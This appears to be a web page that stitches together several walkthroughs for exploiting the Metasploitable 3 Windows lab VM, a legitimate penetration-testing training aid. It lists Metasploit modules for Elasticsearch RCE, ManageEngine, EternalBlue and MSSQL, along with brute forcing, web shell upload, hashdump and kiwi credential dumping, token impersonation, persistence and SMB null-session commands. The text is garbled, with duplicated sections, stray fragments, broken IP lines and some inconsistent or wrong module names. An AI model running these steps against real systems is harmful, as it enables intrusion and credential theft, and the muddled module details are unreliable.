Metasploitable 3 Windows Walkthrough: A Comprehensive Guide If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.
This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills. 1. Lab Setup
Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.
Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin. Build the VM:
mkdir metasploitable3 && cd metasploitable3 vagrant init rapid7/metasploitable3-win2k8 vagrant up Use code with caution.
Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance. 2. Information Gathering
The first step in any engagement is reconnaissance. Let’s identify the open ports and services. Nmap Scan: nmap -sV -sC -O 192.168.x.x Use code with caution. You will notice a massive attack surface, including: Port 80/443: IIS 7.5 Port 445: SMB Port 1433: MSSQL Port 3306: MySQL Port 9200: Elasticsearch
3. Exploitation Path A: ElasticSearch (Remote Code Execution)
ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution.
Search for the exploit: In Metasploit, use search elasticsearch. Configure:
use exploit/multi/elasticsearch/script_static_iv_clobber set RHOSTS [Target IP] set LHOST [Your IP] exploit Use code with caution.
Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed. 4. Exploitation Path B: ManageEngine Desktop Central
Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).
Search: use exploit/windows/http/manageengine_connectionid_write. Execute: Set your RHOSTS and RPORT (usually 8020).
Result: This often grants SYSTEM level access immediately, as the service runs with high privileges. 5. Exploitation Path C: Weak Credentials (SMB/MSSQL)
Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.
SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.
MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell. 6. Post-Exploitation & Privilege Escalation
Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM. Local Exploit Suggester:
use post/multi/recon/local_exploit_suggester set SESSION 1 run Use code with caution.
Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter: metasploitable 3 windows walkthrough
use incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM" Use code with caution. 7. The Flags
Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.
Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.
By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.
Getting Metasploitable 3 up and running on a Windows host is like setting up a playground for aspiring ethical hackers. It’s a intentionally vulnerable machine designed by Rapid7 to help you practice everything from basic scanning to complex post-exploitation. Prerequisites
Before diving in, make sure your host machine is ready. You’ll need: VirtualBox or VMware: To host the virtual machine.
Vagrant: This automates the building and management of your VMs. Packer: Used for creating the machine images.
High Specs: At least 8GB of RAM and 50GB of disk space is recommended since these builds can be heavy. The Setup Process
Unlike Metasploitable 2, which was a simple downloadable file, Metasploitable 3 is built from scratch using scripts. This ensures you have the latest environment.
Install the Tools: Download and install VirtualBox, Vagrant, and Packer on your Windows machine.
Clone the Repository: Open PowerShell or Git Bash and run:git clone https://github.com
Build the Image: Navigate into the folder and use Packer to build the Windows 2008 image. This step can take a while (30-60 minutes) as it downloads the ISO and installs the OS:packer build windows_2008_r2.json
Launch with Vagrant: Once the build finishes, add the box to Vagrant and fire it up:vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3-winvagrant up The Walkthrough: A Typical Attack Cycle
Once the machine is running, you can start your "engagement" from a separate Kali Linux VM. 1. Reconnaissance and Scanning
Start by finding the target's IP address. Use Nmap to see what ports are open:nmap -sV -O [Target_IP]You’ll notice a wide attack surface, including HTTP (80), SMB (445), and various database ports like MySQL (3306). 2. Exploiting Web Vulnerabilities
Metasploitable 3 hosts several web applications. One common target is the ManageEngine Desktop Central instance. You can search for an exploit in Metasploit: msfconsole search manageengine
use exploit/windows/http/manageengine_connection_id_writeSet your RHOSTS and LHOST, then run exploit to gain a shell. 3. SMB and Internal Services
The machine is also vulnerable to classic Windows exploits. If you find the EternalBlue (MS17-010) vulnerability is unpatched, you can jump straight to SYSTEM-level access. use exploit/windows/smb/ms17_010_eternalblue exploit 4. Post-Exploitation
Once you have a Meterpreter session, the real fun begins. You can: Dump Hashes: Use hashdump to get user credentials.
Pivot: Use the machine as a jump box to explore other parts of the network. Part 4: Privilege Escalation – From User to
Search for Flags: Metasploitable 3 includes "flags" (like a CTF) hidden throughout the system to reward your progress. Conclusion
Metasploitable 3 is more than just a target; it’s a masterclass in how modern Windows environments are structured and where they typically fail. By building it yourself and walking through these exploits, you gain a deep understanding of both the "how" and the "why" of cybersecurity. Happy hacking—stay ethical!
One standout feature of Metasploitable 3 (Windows) is the Elasticsearch Remote Code Execution (RCE) vulnerability on Port 9200. 🛠️ Feature Spotlight: Elasticsearch Exploitation
This feature allows you to pivot from basic reconnaissance to a full command shell by exploiting a design flaw in the Elasticsearch scripting engine (CVE-2014-3120). Service: Elasticsearch version 1.1.1.
Vulnerability: Improperly restricted scripting allows an attacker to execute arbitrary Java code.
The Payoff: Successfully running the exploit grants an initial Meterpreter shell, giving you direct access to the Windows file system and command prompt. 🚀 Quick Walkthrough Steps
If you want to test this specific feature, here is the high-level workflow:
Recon: Scan the target IP with Nmap to confirm Port 9200 is open.
Search: Open msfconsole and search for the exploit: search cve-2014-3120. Configure: use exploit/multi/elasticsearch/script_mvel_rce set RHOSTS [Target_IP]
Exploit: Type exploit to launch the attack and drop into a Meterpreter session.
Verify: Use the sysinfo or getuid command to see your current system privileges. 📹 Video Guides
These videos cover the setup and initial exploitation scenarios for the Windows version of Metasploitable 3.
For a deeper dive, check out the comprehensive Metasploitable 3 Documentation or follow specific port-by-port walkthroughs on Medium.
Part [XIII]: Port 9200 — Leveraging Elasticsearch for a Windows Shell
This walkthrough for the Windows version of Metasploitable 3
(typically Windows Server 2008 R2) covers setup, reconnaissance, and common exploitation paths. 1. Setup and Installation Metasploitable 3 is built using Vagrant and VirtualBox .
Requirements: Install Vagrant and VirtualBox on your host machine . Deployment:
Create a project folder: mkdir metasploitable3-workspace && cd metasploitable3-workspace . Download the Vagrantfile from the Rapid7 GitHub .
Run vagrant up win2k8 to build and start the Windows VM (this may take 30–60 minutes) . Credentials: Default login is vagrant / vagrant .
Networking: Ensure the VM is set to Host-Only or NAT Network to keep it isolated from the internet . 2. Reconnaissance (Information Gathering) VirtualBox vboxnet0 )
Start by identifying the target IP and open ports from your attack machine (e.g., Kali Linux).
Identify IP: Run ipconfig on the target Windows VM to find its address .
Nmap Scan: Run a comprehensive scan to find vulnerable services:nmap -sV -sC -p- Key Ports to Watch: Port 21 (FTP): Often contains weak credentials .
Port 80 (HTTP): Hosts vulnerable web applications like ManageEngine or Jenkins . Port 445 (SMB): Susceptible to EternalBlue (MS17-010) .
Port 3389 (RDP): Potential for BlueKeep or credential brute-forcing .
Port 9200 (Elasticsearch): Known Remote Code Execution (RCE) vulnerabilities . 3. Exploitation Walkthroughs Path A: SMB EternalBlue (Port 445)
This is a critical RCE vulnerability in the SMBv1 protocol . Search: In MSFConsole, use search ms17_010_eternalblue. Select: use exploit/windows/smb/ms17_010_eternalblue. Configure: Set RHOSTS to the target IP.
Run: Execute exploit to gain a SYSTEM-level Meterpreter shell . Path B: Elasticsearch RCE (Port 9200)
Elasticsearch 1.1.1 on this machine allows unauthenticated dynamic script execution . Search: search elasticsearch_script_exec.
Select: use exploit/multi/elasticsearch/search_groovy_script. Configure: Set RHOSTS and your LHOST (Kali IP). Run: Gain access as the user running the service . Path C: FTP Brute Force & Web Shell (Port 21/80)
Brute Force: Use auxiliary/scanner/ftp/ftp_login with common wordlists to find credentials .
Upload: Log in via FTP and upload a PHP or ASPX web shell to the webroot (e.g., /www/wwwroot) .
Execute: Navigate to the uploaded file via a browser to trigger your reverse shell . 4. Post-Exploitation Once you have a shell (Meterpreter): SysInfo: Run sysinfo to confirm target details .
Hashdump: Use hashdump to extract local user password hashes for offline cracking .
Persistence: Use the persistence module to maintain access after a reboot .
Your initial foothold might be NETWORK SERVICE or a low-priv user. Time to escalate.
meterpreter > hashdump
# Or
meterpreter > load kiwi
meterpreter > creds_all
192.168.56.102 (example)192.168.56.1vboxnet0)Ensure both VMs can ping each other.
If you have vagrant:vagrant or administrator:vagrant, you can use WinRM.
# Install evil-winrm
gem install evil-winrm
3.4 SMB Null Session & Enumeration
enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N # null session
Mount share:
mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant
Step 2.2: Deep Service Version Scan
Now we figure out what is running.
nmap -sV -sC -O -p 80,445,3389,4848,8172,9200 192.168.56.102
Key Insight for Walkthrough: The presence of WinRM (port 47001) and SMB signing disabled will be our eventual keys to the kingdom.